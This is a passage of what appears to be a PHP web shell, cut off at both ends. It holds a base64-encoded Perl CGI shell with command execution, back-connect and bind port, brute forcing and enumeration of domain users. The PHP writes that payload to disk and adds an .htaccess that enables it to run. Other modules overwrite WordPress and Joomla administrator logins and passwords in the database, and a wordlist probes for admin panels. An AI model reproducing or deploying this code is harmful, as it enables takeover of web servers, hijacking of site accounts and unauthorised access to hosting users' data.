ggc3R5bGU9J3dpZHRoOjE1MHB4Oyc+T3duZXI8L3RoPgoJCTx0aCBzdHlsZT0nd2lkdGg6MTAwcHg7Jz5QZXJtaXNzaW9uPC90aD4KCQk8dGggc3R5bGU9J3dpZHRoOjE1MHB4Oyc+TGFzdCBNb2RpZmllZDwvdGg+CgkJPHRoIHN0eWxlPSd3aWR0aDoyNjBweDsnPkFjdGlvbjwvdGg+PC90cj4iOwoJCW15ICRzdHlsZT0ibGluZSI7CgkJbXkgJGk9MDsKCQlmb3JlYWNoIG15ICRkIChAZG5hbWUpCgkJewoJCQkkc3R5bGU9ICgkc3R5bGUgZXEgImxpbmUiKSA/ICJub3RsaW5lIjogImxpbmUiOwoJCQkkZCA9ICZ0cmltKCRkKTsKCQkJJGRpcm5hbWU9JGQ7CgkJCWlmKCRkIGVxICIuLiIpIAoJCQl7CgkJCQkkZCA9ICZQYXJlbnRGb2xkZXIoJHBhdGgpOwoJCQl9CgkJCWVsc2lmKCRkIGVxICIuIikgCgkJCXsKCQkJCSRkID0gJHBhdGg7CgkJCX0KCQkJZWxzZSAKCQkJewoJCQkJJGQgPSAkcGF0aC4kZDsKCQkJfQoJCQkkcmVzdWx0IC49ICI8dHIgY2xhc3M9JyRzdHlsZSc+CgoJCQk8dGQgaWQ9J0ZpbGVfJGknIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7IGZvbnQtd2VpZ2h0OiBib2xkOyc+PGEgIGhyZWY9Jz9hPWd1aSZkPSIuJGQuIic+WyAiLiRkaXJuYW1lLiIgXTwvYT48L3RkPiI7CgkJCSRyZXN1bHQgLj0gIjx0ZD5ESVI8L3RkPiI7CgkJCSRyZXN1bHQgLj0gIjx0ZCBzdHlsZT0ndGV4dC1hbGlnbjpjZW50ZXI7Jz4iLiZGaWxlT3duZXIoJGQpLiI8L3RkPiI7CgkJCSRyZXN1bHQgLj0gIjx0ZCBpZD0nRmlsZVBlcm1zXyRpJyBzdHlsZT0ndGV4dC1hbGlnbjpjZW50ZXI7JyBvbmRibGNsaWNrPVwicm1fY2htb2RfZm9ybSh0aGlzLCIuJGkuIiwnIi4mRmlsZVBlcm1zKCRkKS4iJywnIi4kZGlybmFtZS4iJylcIiA+PHNwYW4gb25jbGljaz1cImNobW9kX2Zvcm0oIi4kaS4iLCciLiRkaXJuYW1lLiInKVwiID4iLiZGaWxlUGVybXMoJGQpLiI8L3NwYW4+PC90ZD4iOwoJCQkkcmVzdWx0IC49ICI8dGQgc3R5bGU9J3RleHQtYWxpZ246Y2VudGVyOyc+Ii4mRmlsZUxhc3RNb2RpZmllZCgkZCkuIjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcjsnPjxhIGhyZWY9J2phdmFzY3JpcHQ6cmV0dXJuIGZhbHNlOycgb25jbGljaz1cInJlbmFtZV9mb3JtKCRpLCckZGlybmFtZScsJyIuJkFkZFNsYXNoZXMoJkFkZFNsYXNoZXMoJGQpKS4iJylcIj5SZW5hbWU8L2E+ICB8IDxhIG9uY2xpY2s9XCJpZighY29uZmlybSgnUmVtb3ZlIGRpcjogJGRpcm5hbWUgPycpKSB7IHJldHVybiBmYWxzZTt9XCIgaHJlZj0nP2E9Z3VpJmQ9JHBhdGgmcmVtb3ZlPSRkaXJuYW1lJz5SZW1vdmU8L2E+PC90ZD4iOwoJCQkkcmVzdWx0IC49ICI8L3RyPiI7CgkJCSRpKys7CgkJfQoJCWZvcmVhY2ggbXkgJGYgKEBmbmFtZSkKCQl7CgkJCSRzdHlsZT0gKCRzdHlsZSBlcSAibGluZSIpID8gIm5vdGxpbmUiOiAibGluZSI7CgkJCSRmaWxlPSRmOwoJCQkkZiA9ICRwYXRoLiRmOwoJCQkkdmlldyA9ICI/ZGlyPSIuJHBhdGguIiZ2aWV3PSIuJGY7CgkJCSRyZXN1bHQgLj0gIjx0ciBjbGFzcz0nJHN0eWxlJz48dGQgaWQ9J0ZpbGVfJGknIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7Jz48YSBocmVmPSc/YT1jb21tYW5kJmQ9Ii4kcGF0aC4iJmM9ZWRpdCUyMCIuJGZpbGUuIic+Ii4kZmlsZS4iPC9hPjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkPiIuJlBhcnNlRmlsZVNpemUoJkZpbGVTaXplKCRmKSkuIjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcjsnPiIuJkZpbGVPd25lcigkZikuIjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkIGlkPSdGaWxlUGVybXNfJGknIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcjsnIG9uZGJsY2xpY2s9XCJybV9jaG1vZF9mb3JtKHRoaXMsIi4kaS4iLCciLiZGaWxlUGVybXMoJGYpLiInLCciLiRmaWxlLiInKVwiID48c3BhbiBvbmNsaWNrPVwiY2htb2RfZm9ybSgkaSwnJGZpbGUnKVwiID4iLiZGaWxlUGVybXMoJGYpLiI8L3NwYW4+PC90ZD4iOwoJCQkkcmVzdWx0IC49ICI8dGQgc3R5bGU9J3RleHQtYWxpZ246Y2VudGVyOyc+Ii4mRmlsZUxhc3RNb2RpZmllZCgkZikuIjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcjsnPjxhIGhyZWY9Jz9hPWNvbW1hbmQmZD0iLiRwYXRoLiImYz1lZGl0JTIwIi4kZmlsZS4iJz5FZGl0PC9hPiB8IDxhIGhyZWY9J2phdmFzY3JpcHQ6cmV0dXJuIGZhbHNlOycgb25jbGljaz1cInJlbmFtZV9mb3JtKCRpLCckZmlsZScsJ2YnKVwiPlJlbmFtZTwvYT4gfCA8YSBocmVmPSc/YT1kb3dubG9hZCZvPWdvJmY9Ii4kZi4iJz5Eb3dubG9hZDwvYT4gfCA8YSBvbmNsaWNrPVwiaWYoIWNvbmZpcm0oJ1JlbW92ZSBmaWxlOiAkZmlsZSA/JykpIHsgcmV0dXJuIGZhbHNlO31cIiBocmVmPSc/YT1ndWkmZD0kcGF0aCZyZW1vdmU9JGZpbGUnPlJlbW92ZTwvYT48L3RkPiI7CgkJCSRyZXN1bHQgLj0gIjwvdHI+IjsKCQkJJGkrKzsKCQl9CgkJJHJlc3VsdCAuPSAiPC90YWJsZT48L2Rpdj4iOwoJfQoJcmV0dXJuICRyZXN1bHQ7Cn0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRyeSB0byBWaWV3IExpc3QgVXNlcgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBWaWV3RG9tYWluVXNlcgp7CglvcGVuIChkb21haW5zLCAnL2V0Yy9uYW1lZC5jb25mJykgb3IgJGVycj0xOwoJbXkgQGNuenMgPSA8ZG9tYWlucz47CgljbG9zZSBkMG1haW5zOwoJbXkgJHN0eWxlPSJsaW5lIjsKCW15ICRyZXN1bHQ9IjxoNT48Zm9udCBzdHlsZT0nZm9udDogMTVwdCBWZXJkYW5hO2NvbG9yOiAjZmY5OTAwOyc+SG9hbmcgU2EgLSBUcnVvbmcgU2E8L2ZvbnQ+PC9oNT4iOwoJaWYgKCRlcnIpCgl7CgkJJHJlc3VsdCAuPSAgKCc8cD5DMHVsZG5cJ3QgQnlwYXNzIGl0ICwgU29ycnk8L3A+Jyk7CgkJcmV0dXJuICRyZXN1bHQ7Cgl9ZWxzZQoJewoJCSRyZXN1bHQgLj0gJzx0YWJsZT48dHI+PHRoPkRvbWFpbnM8L3RoPiA8dGg+VXNlcjwvdGg+PC90cj4nOwoJfQoJZm9yZWFjaCBteSAkb25lIChAY256cykKCXsKCQlpZigkb25lID1+IG0vLio/em9uZSAiKC4qPykiIHsvKQoJCXsJCgkJCSRzdHlsZT0gKCRzdHlsZSBlcSAibGluZSIpID8gIm5vdGxpbmUiOiAibGluZSI7CgkJCSRmaWxlbmFtZT0gIi9ldGMvdmFsaWFzZXMvIi4kb25lOwoJCQkkb3duZXIgPSBnZXRwd3VpZCgoc3RhdCgkZmlsZW5hbWUpKVs0XSk7CgkJCSRyZXN1bHQgLj0gJzx0ciBjbGFzcz0iJHN0eWxlIiB3aWR0aD01MCU+PHRkPicuJG9uZS4nIDwvdGQ+PHRkPiAnLiRvd25lci4nPC90ZD48L3RyPic7CgkJfQoJfQoJJHJlc3VsdCAuPSAnPC90YWJsZT4nOwoJcmV0dXJuICRyZXN1bHQ7Cn0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFZpZXcgTG9nCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFZpZXdMb2cKewoJaWYoJFdpbk5UKQoJewoJCXJldHVybiAiPGgyPjxmb250IHN0eWxlPSdmb250OiAyMHB0IFZlcmRhbmE7Y29sb3I6ICNmZjk5MDA7Jz5Eb24ndCBydW4gb24gV2luZG93czwvZm9udD48L2gyPiI7Cgl9CglteSAkcmVzdWx0PSI8dGFibGU+PHRyPjx0aD5QYXRoIExvZzwvdGg+PHRoPlN1Ym1pdDwvdGg+PC90cj4iOwoJbXkgQHBhdGhsb2c9KAoJCQkJJy91c3IvbG9jYWwvYXBhY2hlL2xvZ3MvZXJyb3JfbG9nJywKCQkJCScvdmFyL2xvZy9odHRwZC9lcnJvcl9sb2cnLAoJCQkJJy91c3IvbG9jYWwvYXBhY2hlL2xvZ3MvYWNjZXNzX2xvZycKCQkJCSk7CglteSAkaT0wOwoJbXkgJHBlcm1zOwoJbXkgJHNsOwoJZm9yZWFjaCBteSAkbG9nIChAcGF0aGxvZykKCXsKCQlpZigtdyAkbG9nKQoJCXsKCQkJJHBlcm1zPSJPSyI7CgkJfWVsc2UKCQl7CgkJCWNob3AoJHNsID0gYGxuIC1zICRsb2cgZXJyb3JfbG9nXyRpYCk7CgkJCWlmKCZ0cmltKCRscykgZXEgIiIpCgkJCXsKCQkJCWlmKC1yICRscykKCQkJCXsKCQkJCQkkcGVybXM9Ik9LIjsKCQkJCQkkbG9nPSJlcnJvcl9sb2dfIi4kaTsKCQkJCX0KCQkJfWVsc2UKCQkJewoJCQkJJHBlcm1zPSI8Zm9udCBzdHlsZT0nY29sb3I6IHJlZDsnPkNhbmNlbDxmb250PiI7CgkJCX0KCQl9CgkJJHJlc3VsdCAuPTw8RU5EOwoJCTx0cj4KCgkJCTxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiPgoJCQk8dGQ+PGlucHV0IHR5cGU9InRleHQiIG9ua2V5dXA9ImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdsb2dfJGknKS52YWx1ZT0nbGVzcyAnICsgdGhpcy52YWx1ZTsiIHZhbHVlPSIkbG9nIiBzaXplPSc1MCcvPjwvdGQ+CgkJCTx0ZD48aW5wdXQgY2xhc3M9InN1Ym1pdCIgdHlwZT0ic3VibWl0IiB2YWx1ZT0iVHJ5IiAvPjwvdGQ+CgkJCTxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJsb2dfJGkiIG5hbWU9ImMiIHZhbHVlPSJsZXNzICRsb2ciLz4KCQkJPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImNvbW1hbmQiIC8+CgkJCTxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciIgLz4KCQkJPC9mb3JtPgoJCQk8dGQ+JHBlcm1zPC90ZD4KCgkJPC90cj4KRU5ECgkJJGkrKzsKCX0KCSRyZXN1bHQgLj0iPC90YWJsZT4iOwoJcmV0dXJuICRyZXN1bHQ7Cn0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIE1haW4gUHJvZ3JhbSAtIEV4ZWN1dGlvbiBTdGFydHMgSGVyZQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiZSZWFkUGFyc2U7CiZHZXRDb29raWVzOwoKJFNjcmlwdExvY2F0aW9uID0gJEVOVnsnU0NSSVBUX05BTUUnfTsKJFNlcnZlck5hbWUgPSAkRU5WeydTRVJWRVJfTkFNRSd9OwokTG9naW5QYXNzd29yZCA9ICRpbnsncCd9OwokUnVuQ29tbWFuZCA9ICRpbnsnYyd9OwokVHJhbnNmZXJGaWxlID0gJGlueydmJ307CiRPcHRpb25zID0gJGlueydvJ307CiRBY3Rpb24gPSAkaW57J2EnfTsKCiRBY3Rpb24gPSAiY29tbWFuZCIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNpZmllZCwgdXNlIGRlZmF1bHQKCiMgZ2V0IHRoZSBkaXJlY3RvcnkgaW4gd2hpY2ggdGhlIGNvbW1hbmRzIHdpbGwgYmUgZXhlY3V0ZWQKJEN1cnJlbnREaXIgPSAmdHJpbSgkaW57J2QnfSk7CiMgbWFjIGRpbmggeHVhdCB0aG9uZyB0aW4gbmV1IGtvIGNvIGxlbmggbmFvIQokUnVuQ29tbWFuZD0gJFdpbk5UPyJkaXIiOiJkaXIgLWxpYSIgaWYoJFJ1bkNvbW1hbmQgZXEgIiIpOwpjaG9wKCRDdXJyZW50RGlyID0gYCRDbWRQd2RgKSBpZigkQ3VycmVudERpciBlcSAiIik7CgokTG9nZ2VkSW4gPSAkQ29va2llc3snU0FWRURQV0QnfSBlcSAkUGFzc3dvcmQ7CgppZigkQWN0aW9uIGVxICJsb2dpbiIgfHwgISRMb2dnZWRJbikgCQkjIHVzZXIgbmVlZHMvaGFzIHRvIGxvZ2luCnsKCSZQZXJmb3JtTG9naW47Cn1lbHNpZigkQWN0aW9uIGVxICJndWkiKSAjIEdVSSBkaXJlY3RvcnkKewoJJlByaW50UGFnZUhlYWRlcjsKCWlmKCEkV2luTlQpCgl7CgkJJGNobW9kPWludCgkaW57J2NobW9kJ30pOwoJCWlmKCEoJGNobW9kIGVxIDApKQoJCXsKCQkJJGNobW9kPWludCgkaW57J2NobW9kJ30pOwoJCQkkZmlsZT0kQ3VycmVudERpci4kUGF0aFNlcC4kVHJhbnNmZXJGaWxlOwoJCQljaG9wKCRyZXN1bHQ9IGBjaG1vZCAkY2htb2QgIiRmaWxlImApOwoJCQlpZigmdHJpbSgkcmVzdWx0KSBlcSAiIikKCQkJewoJCQkJcHJpbnQgIjxydW4+IERvbmUhIDwvcnVuPjxicj4iOwoJCQl9ZWxzZQoJCQl7CgkJCQlwcmludCAiPHJ1bj4gU29ycnkhIFlvdSBkb250IGhhdmUgcGVybWlzc2lvbnMhIDwvcnVuPjxicj4iOwoJCQl9CgkJfQoJfQoJJHJlbmFtZT0kaW57J3JlbmFtZSd9OwoJaWYoISRyZW5hbWUgZXEgIiIpCgl7CgkJaWYocmVuYW1lKCRUcmFuc2ZlckZpbGUsJHJlbmFtZSkpCgkJewoJCQlwcmludCAiPHJ1bj4gRG9uZSEgPC9ydW4+PGJyPiI7CgkJfWVsc2UKCQl7CgkJCXByaW50ICI8cnVuPiBTb3JyeSEgWW91IGRvbnQgaGF2ZSBwZXJtaXNzaW9ucyEgPC9ydW4+PGJyPiI7CgkJfQoJfQoJJHJlbW92ZT0kaW57J3JlbW92ZSd9OwoJaWYoJHJlbW92ZSBuZSAiIikKCXsKCQkkcm0gPSAkQ3VycmVudERpci4kUGF0aFNlcC4kcmVtb3ZlOwoJCWlmKC1kICRybSkKCQl7CgkJCSZSbURpcigkcm0pOwoJCX1lbHNlCgkJewoJCQlpZih1bmxpbmsoJHJtKSkKCQkJewoJCQkJcHJpbnQgIjxydW4+IERvbmUhIDwvcnVuPjxicj4iOwoJCQl9ZWxzZQoJCQl7CgkJCQlwcmludCAiPHJ1bj4gU29ycnkhIFlvdSBkb250IGhhdmUgcGVybWlzc2lvbnMhIDwvcnVuPjxicj4iOwoJCQl9CQkJCgkJfQoJfQoJcHJpbnQgJkxpc3REaXI7Cgp9CmVsc2lmKCRBY3Rpb24gZXEgImNvbW1hbmQiKQkJCQkgCSMgdXNlciB3YW50cyB0byBydW4gYSBjb21tYW5kCnsKCSZQcmludFBhZ2VIZWFkZXIoImMiKTsKCXByaW50ICZFeGVjdXRlQ29tbWFuZDsKfQplbHNpZigkQWN0aW9uIGVxICJzYXZlIikJCQkJIAkjIHVzZXIgd2FudHMgdG8gc2F2ZSBhIGZpbGUKewoJJlByaW50UGFnZUhlYWRlcjsKCWlmKCZTYXZlRmlsZSgkaW57J2RhdGEnfSwkaW57J2ZpbGUnfSkpCgl7CgkJcHJpbnQgIjxydW4+IERvbmUhIDwvcnVuPjxicj4iOwoJfWVsc2UKCXsKCQlwcmludCAiPHJ1bj4gU29ycnkhIFlvdSBkb250IGhhdmUgcGVybWlzc2lvbnMhIDwvcnVuPjxicj4iOwoJfQoJcHJpbnQgJkxpc3REaXI7Cn0KZWxzaWYoJEFjdGlvbiBlcSAidXBsb2FkIikgCQkJCQkjIHVzZXIgd2FudHMgdG8gdXBsb2FkIGEgZmlsZQp7CgkmUHJpbnRQYWdlSGVhZGVyOwoKCXByaW50ICZVcGxvYWRGaWxlOwp9CmVsc2lmKCRBY3Rpb24gZXEgImJhY2tiaW5kIikgCQkJCSMgdXNlciB3YW50cyB0byBiYWNrIGNvbm5lY3Qgb3IgYmluZCBwb3J0CnsKCSZQcmludFBhZ2VIZWFkZXIoImNsaWVudHBvcnQiKTsKCXByaW50ICZCYWNrQmluZDsKfQplbHNpZigkQWN0aW9uIGVxICJicnV0ZWZvcmNlciIpIAkJCSMgdXNlciB3YW50cyB0byBicnV0ZSBmb3JjZQp7CgkmUHJpbnRQYWdlSGVhZGVyOwoJcHJpbnQgJkJydXRlRm9yY2VyOwp9ZWxzaWYoJEFjdGlvbiBlcSAiZG93bmxvYWQiKSAJCQkJIyB1c2VyIHdhbnRzIHRvIGRvd25sb2FkIGEgZmlsZQp7CglwcmludCAmRG93bmxvYWRGaWxlOwp9ZWxzaWYoJEFjdGlvbiBlcSAiY2hlY2tsb2ciKSAJCQkJIyB1c2VyIHdhbnRzIHRvIHZpZXcgbG9nIGZpbGUKewoJJlByaW50UGFnZUhlYWRlcjsKCXByaW50ICZWaWV3TG9nOwoKfWVsc2lmKCRBY3Rpb24gZXEgImRvbWFpbnN1c2VyIikgCQkJIyB1c2VyIHdhbnRzIHRvIHZpZXcgbGlzdCB1c2VyL2RvbWFpbgp7CgkmUHJpbnRQYWdlSGVhZGVyOwoJcHJpbnQgJlZpZXdEb21haW5Vc2VyOwp9ZWxzaWYoJEFjdGlvbiBlcSAibG9nb3V0IikgCQkJCSMgdXNlciB3YW50cyB0byBsb2dvdXQKewoJJlBlcmZvcm1Mb2dvdXQ7Cn0KJlByaW50UGFnZUZvb3Rlcjs=\';\r\n\r\n$file = fopen("cgi2012.izo" ,"w+");\r\n$write = fwrite ($file ,base64_decode($cgi2012));\r\nfclose($file);\r\n    chmod("cgi2012.izo",0755);\r\n   echo " <iframe src=cgi2012/cgi2012.izo width=96% height=76% frameborder=0></iframe>\r\n \r\n </div>"; }\r\n \r\n ///////////////////////////////////////////////////////////////////////////\r\n \r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'config\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=config" method="post">\r\n\r\n<?php\r\n\r\necho "<center/><br/><b><font color=#00ff00>+--==[ Config Shell Priv8 SCR ]==--+</font></b><br><br>";\r\n\r\n  mkdir(\'config\', 0755);\r\n    chdir(\'config\');\r\n        $kokdosya = ".htaccess";\r\n        $dosya_adi = "$kokdosya";\r\n        $dosya = fopen ($dosya_adi , \'w\') or die ("Error cuyy!");\r\n        $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI\r\n\t\t\r\nAddType application/x-httpd-cgi .cpc\r\n\r\nAddHandler cgi-script .izo\r\nAddHandler cgi-script .izo";    \r\n        fwrite ( $dosya , $metin ) ;\r\n        fclose ($dosya);\r\n\r\n$file = fopen("config.izo" ,"w+");\r\n$write = fwrite ($file ,base64_decode($configshell));\r\nfclose($file);\r\n    chmod("config.izo",0755);\r\n   echo "<iframe src=config/config.izo width=97% height=100% frameborder=0></iframe>\r\n   </div>"; \r\n}\r\n/////////////////////////////////////////////////////////////////////////\r\n\r\n\r\n///////////////////////////////////////////////////////////////////////////\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'wp-reset\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=wp-reset" method="post">\r\n\r\n<?php\r\n\r\necho "<center/><br/><b><font color=#00ff00>+--==[  Wordpress Reset Password  ]==--+</font></b><br><br>";\r\n  \r\n  if(empty($_POST[\'pwd\'])){\r\n  \r\necho "<FORM method=\'POST\'>\r\n<table class=\'tabnet\' style=\'width:300px;\'> <tr><th colspan=\'2\'>Connect to mySQL server</th></tr> <tr><td>&nbsp;&nbsp;Hostname</td><td>\r\n<input style=\'width:220px;\' class=\'inputz\' type=\'text\' name=\'localhost\' value=\'localhost\' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>\r\n<input style=\'width:220px;\' class=\'inputz\' type=\'text\' name=\'database\' value=\'wp-\' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>\r\n<input style=\'width:220px;\' class=\'inputz\' type=\'text\' name=\'username\' value=\'wp-\' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>\r\n<input style=\'width:220px;\' class=\'inputz\' type=\'text\' name=\'password\' value=\'**\' /></td></tr>\r\n<tr><td>&nbsp;&nbsp;User baru</td><td>\r\n<input style=\'width:220px;\' class=\'inputz\' type=\'text\' name=\'admin\' value=\'admin\' /></td></tr>\r\n <tr><td>&nbsp;&nbsp;Pass Baru</td><td>\r\n<input style=\'width:80px;\' class=\'inputz\' type=\'text\' name=\'pwd\' value=\'123456\' />&nbsp;\r\n\r\n<input style=\'width:19%;\' class=\'inputzbut\' type=\'submit\' value=\'change!\' name=\'send\' /></FORM>\r\n</td></tr> </table><br><br><br><br>\r\n";\r\n}else{\r\n$localhost = $_POST[\'localhost\'];\r\n$database  = $_POST[\'database\'];\r\n$username  = $_POST[\'username\'];\r\n$password  = $_POST[\'password\'];\r\n$pwd   = $_POST[\'pwd\'];\r\n$admin = $_POST[\'admin\'];\r\n\r\n\r\n @mysql_connect($localhost,$username,$password) or die(mysql_error());\r\n @mysql_select_db($database) or die(mysql_error());\r\n\r\n$hash = crypt($pwd);\r\n$a4s=@mysql_query("UPDATE wp_users SET user_login =\'".$admin."\' WHERE ID = 1") or die(mysql_error());\r\n$a4s=@mysql_query("UPDATE wp_users SET user_pass =\'".$hash."\' WHERE ID = 1") or die(mysql_error());\r\n$a4s=@mysql_query("UPDATE wp_users SET user_login =\'".$admin."\' WHERE ID = 2") or die(mysql_error());\r\n$a4s=@mysql_query("UPDATE wp_users SET user_pass =\'".$hash."\' WHERE ID = 2") or die(mysql_error());\r\n$a4s=@mysql_query("UPDATE wp_users SET user_login =\'".$admin."\' WHERE ID = 3") or die(mysql_error());\r\n$a4s=@mysql_query("UPDATE wp_users SET user_pass =\'".$hash."\' WHERE ID = 3") or die(mysql_error());\r\n$a4s=@mysql_query("UPDATE wp_users SET user_email =\'".$SQL."\' WHERE ID = 1") or die(mysql_error());\r\n\r\n\r\nif($a4s){\r\necho "<b> Success ..!! :)) sekarang bisa login ke wp-admin</b> ";\r\n}\r\n\r\n}\r\n  \r\n  \r\n  echo "\r\n   </div>"; }\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'jm-reset\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=jm-reset" method="post">\r\n\r\n<?php\r\n\r\necho "<center/><br/><b><font color=#00ff00>+--==[  Joomla Reset Password ]==--+</font></b><br><br>";\r\n\tif(empty($_POST[\'pwd\'])){\r\necho "<FORM method=\'POST\'><table class=\'tabnet\' style=\'width:300px;\'> <tr><th colspan=\'2\'>Connect to mySQL </th></tr> <tr><td>&nbsp;&nbsp;Host</td><td>\r\n<input style=\'width:270px;\' class=\'inputz\' type=\'text\' name=\'localhost\' value=\'localhost\' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>\r\n<input style=\'width:270px;\' class=\'inputz\' type=\'text\' name=\'database\' value=\'database\' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>\r\n<input style=\'width:270px;\' class=\'inputz\' type=\'text\' name=\'username\' value=\'db_user\' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>\r\n<input style=\'width:270px;\' class=\'inputz\' type=\'password\' name=\'password\' value=\'**\' /></td></tr>\r\n<tr><td>&nbsp;&nbsp;User baru</td><td>\r\n<input style=\'width:270px;\' class=\'inputz\' name=\'admin\' value=\'admin\' /></td></tr>\r\n <tr><td>&nbsp;&nbsp;pass baru </td><td>123456 = \r\n<input style=\'width:130px;\' class=\'inputz\' name=\'pwd\' value=\'e10adc3949ba59abbe56e057f20f883e\' />&nbsp;\r\n\r\n<input style=\'width:23%;\' class=\'inputzbut\' type=\'submit\' value=\'change!\' name=\'send\' /></FORM>\r\n</td></tr> </table><br><br><br><br>\r\n";\r\n}else{\r\n$localhost = $_POST[\'localhost\'];\r\n$database  = $_POST[\'database\'];\r\n$username  = $_POST[\'username\'];\r\n$password  = $_POST[\'password\'];\r\n$pwd   = $_POST[\'pwd\'];\r\n$admin = $_POST[\'admin\'];\r\n@mysql_connect($localhost,$username,$password) or die(mysql_error());\r\n@mysql_select_db($database) or die(mysql_error());\r\n$hash = crypt($pwd);\r\n$SQL=@mysql_query("UPDATE jos_users SET username =\'".$admin."\' WHERE ID = 62") or die(mysql_error());\r\n$SQL=@mysql_query("UPDATE jos_users SET password =\'".$pwd."\' WHERE ID = 62") or die(mysql_error());\r\n$SQL=@mysql_query("UPDATE jos_users SET username =\'".$admin."\' WHERE ID = 63") or die(mysql_error());\r\n$SQL=@mysql_query("UPDATE jos_users SET password =\'".$pwd."\' WHERE ID = 63") or die(mysql_error());\r\n$SQL=@mysql_query("UPDATE jos_users SET username =\'".$admin."\' WHERE ID = 64") or die(mysql_error());\r\n$SQL=@mysql_query("UPDATE jos_users SET password =\'".$pwd."\' WHERE ID = 64") or die(mysql_error());\r\n$SQL=@mysql_query("UPDATE jos_users SET username =\'".$admin."\' WHERE ID = 65") or die(mysql_error());\r\n$SQL=@mysql_query("UPDATE jos_users SET password =\'".$pwd."\' WHERE ID = 65") or die(mysql_error());\r\nif($SQL){\r\necho "<b>Success : skarang password barunya >>> - (123456)";\r\n}\r\n}\r\n\t\r\n  echo "\r\n   </div>"; \r\n} \r\n//////////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'adfin\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=adfin" method="post">\r\n\r\n<?php\r\nset_time_limit(0);\r\nerror_reporting(0);\r\n$list[\'front\'] ="admin\r\nadm\r\nadmincp\r\nadmcp\r\ncp\r\nmodcp\r\nmoderatorcp\r\nadminare\r\nadmins\r\ncpanel\r\ncontrolpanel";\r\n$list[\'end\'] = "admin1.php\r\nadmin1.html\r\nadmin2.php\r\nadmin2.html\r\nyonetim.php\r\nyonetim.html\r\nyonetici.php\r\nyonetici.html\r\nccms/\r\nccms/login.php\r\nccms/index.php\r\nmaintenance/\r\nwebmaster/\r\nadm/\r\nconfiguration/\r\nconfigure/\r\nwebsvn/\r\nadmin/\r\nadmin/account.php\r\nadmin/account.html\r\nadmin/index.php\r\nadmin/index.html\r\nadmin/login.php\r\nadmin/login.html\r\nadmin/home.php\r\nadmin/controlpanel.html\r\nadmin/controlpanel.php\r\nadmin.php\r\nadmin.html\r\nadmin/cp.php\r\nadmin/cp.html\r\ncp.php\r\ncp.html\r\nadministrator/\r\nadministrator/index.html\r\nadministrator/index.php\r\nadministrator/login.html\r\nadministrator/login.php\r\nadministrator/account.html\r\nadministrator/account.php\r\nadministrator.php\r\nadministrator.html\r\nlogin.php\r\nlogin.html\r\nmodelsearch/login.php\r\nmoderator.php\r\nmoderator.html\r\nmoderator/login.php\r\nmoderator/login.html\r\nmoderator/admin.php\r\nmoderator/admin.html\r\nmoderator/\r\naccount.php\r\naccount.html\r\ncontrolpanel/\r\ncontrolpanel.php\r\ncontrolpanel.html\r\nadmincontrol.php\r\nadmincontrol.html\r\nadminpanel.php\r\nadminpanel.html\r\nadmin1.asp\r\nadmin2.asp\r\nyonetim.asp\r\nyonetici.asp\r\nadmin/account.asp\r\nadmin/index.asp\r\nadmin/login.asp\r\nadmin/home.asp\r\nadmin/controlpanel.asp\r\nadmin.asp\r\nadmin/cp.asp\r\ncp.asp\r\nadministrator/index.asp\r\nadministrator/login.asp\r\nadministrator/account.asp\r